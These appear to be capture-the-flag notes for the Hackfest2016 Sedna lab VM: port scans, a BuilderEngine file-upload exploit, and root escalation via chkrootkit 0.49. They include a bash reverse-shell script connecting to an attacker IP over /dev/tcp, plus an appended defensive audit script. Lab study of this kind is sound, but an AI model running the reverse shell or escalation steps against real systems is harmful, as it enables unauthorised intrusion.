Walkthru:
A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, ]
B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation]
C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]
D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [ditrycow]
Notes:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
Ran dirb and nikto on ports 80 and 8080; found some interesting folders/files and Java Server Pages (JSP), some returning 403 Forbidden. JSP and Coyote show many pages but nothing significant.
Some vulns came up but nothing worked. Ran SMB commands but nothing so far. robots.txt didn't show anything either, and the PUT method also returned 403 Forbidden. Tried hydra against SMB and SSH for user "victor" but got nothing.
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file. Tried to upload a file using the POSTER plugin, but it renamed the file and stripped the PHP extension. The exploit also includes HTML code that can be used to upload a reverse shell file with a POST request.
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home
Tried many exploits for privilege escalation but none worked. I decided to do more enumeration and found that chkrootkit is installed on the machine; to our luck, version 0.49 is installed. This was found with a privilege escalation script.
Searching on searchsploit, we found an exploit for chkrootkit version 0.49. Per the vulnerability, chkrootkit will execute the files with root privileges. We will now create a bash script for a reverse shell and wget it into the "tmp" folder; 192.168.213.149 is Kali in this case:
#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1
Once the script is ready, we will wget the script into the "tmp" directory and make it executable.
Now we start the listener on port 445 on our attacker machine and wait for the file to execute and send back the reverse shell, which took 5-15 minutes. I could run it manually, but that would only give me www-data access.
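Added detection example (not part of the original notes or of the exploit referenced above): a shell audit for the chkrootkit condition described here, written from the defender's side. Assumptions: affected versions are 0.49 and earlier, the file they execute from /tmp is named update, and the version string, tmp directory and cron directory are passed in as parameters so the check can run on a constructed tree as well as a live host.

```shell
#!/bin/sh
# Added detection example, not from the original notes. It audits a host for the
# condition used above: a chkrootkit old enough to run a file from /tmp as root,
# scheduled by cron. Assumptions (labelled): affected versions are 0.49 and
# earlier, and the file they execute is /tmp/update. TMPDIR and CRONDIR are
# parameters (e.g. /tmp and /etc/cron.d on a live host).

# version_le A B: succeed when dotted numeric version A is less than or equal to B.
version_le() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n 1)" = "$1" ]
}

# audit_chkrootkit VERSION TMPDIR CRONDIR
# Prints one FINDING line per issue and returns the number of findings;
# 0 means the installed version is newer than 0.49 and nothing needs doing.
audit_chkrootkit() {
    ver="$1"; tmp="$2"; cron="$3"; count=0
    if ! version_le "$ver" "0.49"; then
        echo "OK: chkrootkit $ver is newer than 0.49"
        return 0
    fi
    echo "FINDING: chkrootkit $ver executes $tmp/update as root; upgrade it"
    count=$((count + 1))
    # A planted file is the indicator that someone is already using the bug.
    if [ -e "$tmp/update" ]; then
        if [ -x "$tmp/update" ]; then note="executable"; else note="not executable"; fi
        echo "FINDING: $tmp/update exists ($note); remove it and inspect its contents"
        count=$((count + 1))
    fi
    # A cron entry turns the bug into unattended root code execution.
    if grep -rqs 'chkrootkit' "$cron"; then
        echo "FINDING: a cron job under $cron runs chkrootkit; it would execute the planted file as root"
        count=$((count + 1))
    fi
    return "$count"
}
```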
smb_192.168.117.8.nmap